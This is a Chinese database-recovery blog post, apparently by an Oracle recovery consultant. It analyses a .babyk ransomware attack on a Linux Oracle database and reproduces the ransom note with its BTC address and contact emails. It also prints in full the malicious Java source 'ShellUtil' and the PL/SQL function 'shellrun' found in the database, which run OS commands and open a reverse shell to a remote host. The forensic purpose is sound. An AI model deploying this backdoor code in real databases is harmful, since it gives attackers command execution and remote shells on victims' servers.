-
加我公众号(orasos)
加我微信(17813235971)
加我QQ(107644445)
标签云
asm恢复 bbed bootstrap$ dul kcbzib_kcrsds_1 kccpb_sanity_check_2 kcratr_nab_less_than_odr MySQL恢复 ORA-00312 ORA-00704 ORA-00742 ORA-01110 ORA-01200 ORA-01555 ORA-01578 ORA-01595 ORA-600 2662 ORA-600 2663 ORA-600 3020 ORA-600 4000 ORA-600 4137 ORA-600 4193 ORA-600 4194 ORA-600 16703 ORA-600 kcbzib_kcrsds_1 ORA-600 KCLCHKBLK_4 ORA-600 kcratr_nab_less_than_odr ORA-600 kdsgrp1 ORA-15042 ORA-15196 ORACLE 12C oracle dul ORACLE PATCH Oracle Recovery Tools oracle加密恢复 oracle勒索 oracle勒索恢复 oracle异常恢复 ORACLE恢复 Oracle 恢复 ORACLE数据库恢复 oracle 比特币 OSD-04016 YOUR FILES ARE ENCRYPTED 比特币加密文章分类
- Others (2)
- 中间件 (2)
- WebLogic (2)
- 操作系统 (112)
- 数据库 (1,841)
- DB2 (22)
- MySQL (81)
- Oracle (1,669)
- Data Guard (53)
- EXADATA (8)
- GoldenGate (24)
- ORA-xxxxx (168)
- ORACLE 12C (72)
- ORACLE 18C (6)
- ORACLE 19C (15)
- ORACLE 21C (3)
- Oracle 23ai (8)
- Oracle ASM (69)
- Oracle Bug (8)
- Oracle RAC (55)
- Oracle 安全 (6)
- Oracle 开发 (28)
- Oracle 监听 (29)
- Oracle备份恢复 (632)
- Oracle安装升级 (103)
- Oracle性能优化 (62)
- 专题索引 (5)
- 勒索恢复 (89)
- PostgreSQL (37)
- pdu工具 (7)
- PostgreSQL恢复 (13)
- SQL Server (34)
- SQL Server恢复 (14)
- TimesTen (7)
- 达梦数据库 (4)
- 达梦恢复 (2)
- 生活娱乐 (2)
- 至理名言 (11)
- 虚拟化 (2)
- VMware (2)
- 软件开发 (47)
- Asp.Net (9)
- JavaScript (12)
- PHP (2)
- 小工具 (30)
-
最近发表
- aix环境rac 私网直连导致haip启动异常
- 又一例TRIM导致asm磁盘数据丢失的故障
- 一次运气好的ORA-600 kcratr_nab_less_than_odr故障处理
- OraFHR快速open被勒索加密破坏的Oracle数据库
- obet一键恢复offline数据文件
- 记录一次win删除数据文件完美恢复案例
- Oracle典型故障:The controlfile header block returned by the OS has a sequence number that is too old
- 国产信创库fio破坏主备库以及备份故障处理
- .wman扩展名勒索mysql数据库恢复
- Oracle数据库被勒索加密一键open工具–OraFHR
- 通过alert日志回顾其他dba oracle异常恢复故障处理以及后续open数据库操作
- 年前几例Oracle数据库被加密为.wman的数据库故障恢复
- 文件系统损坏导致数据库异常故障处理
- expdp导出xml列报ORA-22924故障处理
- obet处理ORA-704 ORA-604 ORA-1578故障
- obet修复csc higher than block scn类型坏块
- ORA-600 kcratr_nab_less_than_odr和ORA-600 4193故障处理
- aix环境10g由于控制器异常导致ORA-600 4000故障处理
- ORA-600 3716故障处理
- 不当恢复truncate数据导致数据库不能open处理
标签归档:linux oracle加密
linux环境oracle数据库被文件系统勒索加密为.babyk扩展名溯源
最近有一个客户使用了xx厂商的erp软件的Oracle数据库服务被勒索加密(运行在linux平台)
文件加密结果
文件名称被加上.babyk,每个目录下面会留下一个README_babyk.txt文件
README_babyk.txt文件内容
___
______ ______ ______ .' `. ______ ______ ______
|______||______||______| / .-. \ .--. _ .--. .--. |______||______||______|
______ ______ ______ | | | |/ .'`\ \[ '/'`\ \( (`\] ______ ______ ______
|______||______||______| \ `-' /| \__. | | \__/ | `'.'. |______||______||______|
`.___.' '.__.' | ;.__/ [\__) )
[__|
=========================================================
What Happened to My Computer?
Your important files are encrypted.
Many of your documents, photos, videos, databases and other files are no longer
accessible because they have been encrypted. Maybe you are busy looking for a way to
recover your files, but do not waste your time.
=========================================================
=========================================================
Can I Recover My Files?
Sure. We guarantee that you can recover all your files safely and easily. But you have
not so enough time.if you want to decrypt all your files, you need to pay.
You only have 3 days to submit the payment. After that the price will be doubled.
Also, if you don't pay in 7 days, you won't be able to recover your files forever.
=========================================================
=========================================================
How Do I Pay?
Your Encryption ID:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Payment is accepted in BTC only. If you don't know what's BTC, please Google for
information on how to buy and pay for BTC.
Send $6000 worth of BTC to this address:
bc1q2p280472y0ssqcr6lhzz3qxxgevg3a63ewacl9
After the payment is completed, Please send your encryption ID and proof of payment to our email.
We will reply to the decryption program to your email address.
=========================================================
=========================================================
How to Contact Us?
aip6jmb@tuta.io
setack@tuta.io
=========================================================
*Warning: Don't try to decrypt by yourself, you may permanently damage your files.
然后客户找人进行勒索解密,结果对于大于16G左右的文件解密失败.解密失败原因是由于较大文件加密算法问题,导致他们拿到了解密程序也无法解密,具体对于加密文件对比说明:
解密成功文件大小和文件尾部
解密失败文件大小和文件尾部
通过对比可以确认文件和占用空间一致,而且尾部没有多出来38byte的字符串的文件是属于解密失败(因为本身加密就不正常)
被勒索加密源头分析
通过解密成功的system01.dbf文件打开库,然后检查数据库中对象,发现一个异常的函数shellrun
create or replace function shellrun(methodName varchar2,
params varchar2,
encoding varchar2) return varchar2 as
language java name 'ShellUtil.run(java.lang.String,java.lang.String,java.lang.String) return java.lang.String';
分析对应的java相关的ShellUtil,检查发现有以下部分
进一步分析ShellUtil中内容
create or replace and compile java source named "ShellUtil" as
import java.io.*;
import java.net.Socket;
import java.util.concurrent.RecursiveTask;
public class ShellUtil extends Object{
public static String run(String methodName, String params, String encoding) {
String res = "";
if (methodName.equals("exec")) {
res = ShellUtil.exec(params, encoding);
}else if (methodName.equals("connectback")) {
String ip = params.substring(0, params.indexOf("^"));
String port = params.substring(params.indexOf("^") + 1);
res = ShellUtil.connectBack(ip, Integer.parseInt(port));
}else {
res = "unkown methodName";
}
return res;
}
public static String exec(String command, String encoding) {
StringBuffer result = new StringBuffer();
try {
String[] finalCommand;
if (System.getProperty("os.name").toLowerCase().contains("windows")) {
String systemRootvariable;
try {
systemRootvariable = System.getenv("SystemRoot");
}
catch (ClassCastException e) {
systemRootvariable = System.getProperty("SystemRoot");
}
finalCommand = new String[3];
finalCommand[0] = systemRootvariable+"\\system32\\cmd.exe";
finalCommand[1] = "/c";
finalCommand[2] = command;
} else { // Linux or Unix System
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}
BufferedReader readerIn = null;
BufferedReader readerError = null;
try {
readerIn = new BufferedReader(new InputStreamReader
(Runtime.getRuntime().exec(finalCommand).getInputStream(),encoding));
String stemp = "";
while ((stemp = readerIn.readLine()) != null){
result.append(stemp).append("\n");
}
}catch (Exception e){
result.append(e.toString());
}finally {
if (readerIn != null) {
readerIn.close();
}
}
try {
readerError = new BufferedReader(new InputStreamReader
(Runtime.getRuntime().exec(finalCommand).getErrorStream(), encoding));
String stemp = "";
while ((stemp = readerError.readLine()) != null){
result.append(stemp).append("\n");
}
}catch (Exception e){
result.append(e.toString());
}finally {
if (readerError != null) {
readerError.close();
}
}
} catch (Exception e) {
result.append(e.toString());
}
return result.toString();
}
public static String connectBack(String ip, int port) {
class StreamConnector extends Thread {
InputStream sp;
OutputStream gh;
StreamConnector(InputStream sp, OutputStream gh) {
this.sp = sp;
this.gh = gh;
}
@Override
public void run() {
BufferedReader xp = null;
BufferedWriter ydg = null;
try {
xp = new BufferedReader(new InputStreamReader(this.sp));
ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
char buffer[] = new char[1024];
int length;
while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
ydg.write(buffer, 0, length);
ydg.flush();
}
} catch (Exception e) {}
try {
if (xp != null) {
xp.close();
}
if (ydg != null) {
ydg.close();
}
} catch (Exception e) {
}
}
}
try {
String sp;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
sp = new String("/bin/sh");
} else {
sp = new String("cmd.exe");
}
Socket sk = new Socket(ip, port);
Process ps = Runtime.getRuntime().exec(sp);
(new StreamConnector(ps.getInputStream(), sk.getOutputStream())).start();
(new StreamConnector(sk.getInputStream(), ps.getOutputStream())).start();
} catch (Exception e) {
}
return "^OK^";
}
}
这些程序的创建时间分析
这些程序都是4月24日14:58:40-14:58:50之间创建,通过咨询客户,客户的应用在4月24日上午进行了升级.基于上述情况,初步怀疑是通过应用给数据库层面注入了恶意脚本,创建了函数和一些java包,实现提权获取了操作系统权限,然后对操作系统文件进行加密.最终结论需要等应用和安全厂商进行确认
